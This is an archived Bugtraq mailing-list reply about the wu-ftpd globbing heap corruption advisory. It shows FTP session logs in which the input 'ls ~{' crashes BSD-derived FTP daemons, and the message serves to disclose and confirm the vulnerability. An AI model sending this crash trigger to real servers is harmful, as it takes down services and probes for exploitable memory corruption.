Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

From: GiulioMaria Fontana (fontana@datawell.it)
Date: 11/29/01 

From: GiulioMaria Fontana <fontana@datawell.it>
To: <bugtraq@securityfocus.com>
Subject: Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
Date: Thu, 29 Nov 2001 11:53:44 +0100
Message-Id: <20011129105345.83F4B42F70@psycho.sinapsi.net.com>

Il 00:36, giovedì 29 novembre 2001, script0r ha scritto:

> I am running the a linux port of the bsd ftpd and it might be vulnerable to
> a similar attack,
>
> ftp localhost
> Connected to localhost.
> 220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
> Name (localhost:user): ftp
> 331 Guest login ok, type your name as password.
> Password:
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls ~{
> 200 PORT command successful.
> 421 Service not available, remote server has closed connection
>
> in inetd I find an error stating that the ftpd process has died unexpectedly
>
> Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11

[psycho@psycho 11/29/01/gio psycho]> ftp urano
Connected to urano.xxx.xxx
220 urano.xxx.xxx FTP server (Version 6.5.5 VFTPD, based on Version
6.5/OpenBSD) ready.
Name (urano:psycho): gmfontana
331 Password required for gmfontana.
Password:
230 User gmfontana logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
421 Service not available, remote server has closed connection
ftp>

Giulio

Relevant Pages